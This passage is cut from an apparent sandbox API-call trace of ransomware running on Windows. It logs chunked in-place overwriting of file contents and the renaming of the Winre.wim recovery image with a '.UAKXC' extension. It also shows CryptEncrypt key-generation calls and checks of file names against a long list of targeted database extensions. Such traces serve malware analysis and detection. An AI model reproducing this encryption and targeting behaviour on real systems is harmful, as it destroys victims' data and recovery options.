dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.370] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x12332e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x12332e, lpOverlapped=0x0) returned 1 [0149.375] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x102332e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.375] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0150.851] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.851] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0150.955] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0151.428] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.428] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0151.492] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0154.292] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.292] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0154.684] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x12332e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x12332e, lpOverlapped=0x0) returned 1 [0154.699] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffedccd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.700] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x12332e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x12332e, lpOverlapped=0x0) returned 1 [0154.704] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x102332e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.704] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0156.012] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.012] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0156.333] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0157.248] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.248] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0157.750] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x500000, lpOverlapped=0x0) returned 1 [0158.446] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.446] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x500000, lpOverlapped=0x0) returned 1 [0158.883] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0x12332e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0x12332e, lpOverlapped=0x0) returned 1 [0159.417] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xffedccd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.417] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x12332e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0x12332e, lpOverlapped=0x0) returned 1 [0159.437] CloseHandle (hObject=0x6cc) returned 1 [0160.774] GetProcessHeap () returned 0xea0000 [0160.774] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77970d0 [0160.775] lstrcpyW (in: lpString1=0x77970d0, lpString2="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" [0160.775] lstrcatW (in: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpString2=".UAKXC" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.UAKXC") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.UAKXC" [0160.775] MoveFileW (lpExistingFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), lpNewFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.UAKXC" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim.uakxc")) returned 1 [0160.776] GetProcessHeap () returned 0xea0000 [0160.776] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77970d0 | out: hHeap=0xea0000) returned 1 [0160.776] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd7f0 | out: hHeap=0xea0000) returned 1 [0160.776] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2650 | out: hHeap=0xea0000) returned 1 [0160.776] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0160.776] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0160.777] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0160.777] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 0x2020 [0160.782] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0160.782] GetLastError () returned 0x0 [0160.782] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=9503) returned 1 [0160.782] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".4dd") returned 0x0 [0160.782] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".4dl") returned 0x0 [0160.782] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".accdb") returned 0x0 [0160.782] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".accdc") returned 0x0 [0160.782] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".accde") returned 0x0 [0160.782] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".accdr") returned 0x0 [0160.782] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".accdt") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".accft") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".adb") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ade") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".adf") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".adp") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".arc") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ora") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".alf") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ask") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".btr") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".bdf") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".cat") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".cdb") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ckp") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".cma") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".cpd") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dacpac") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dad") returned 0x0 [0160.783] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dadiagrams") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".daschema") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".db") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".db-shm") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".db-wal") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".db3") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dbc") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dbf") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dbs") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dbt") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dbv") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dbx") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dcb") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dct") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dcx") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ddl") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dlis") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dp1") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dqy") returned 0x0 [0160.784] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dsk") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dsn") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dtsx") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".dxl") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".eco") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ecx") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".edb") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".epim") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".exb") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fcd") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fdb") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fic") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fmp") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fmp12") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fmpsl") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fol") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fp3") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fp4") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fp5") returned 0x0 [0160.785] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fp7") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".fpt") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".frm") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".gdb") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".grdb") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".gwi") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".hdb") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".his") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ib") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".idb") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ihx") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".itdb") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".itw") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".jet") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".jtx") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".kdb") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".kexi") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".kexic") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".kexis") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".lgc") returned 0x0 [0160.786] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".lwx") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".maf") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".maq") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mar") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mas") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mav") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mdb") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mdf") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mpd") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mrg") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mud") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".mwb") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".myd") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ndf") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".nnt") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".nrmlib") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ns2") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ns3") returned 0x0 [0160.787] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".ns4") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".nsf") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".nv") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".nv2") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".nwdb") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".nyf") returned 0x0 [0160.788] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".odb") returned 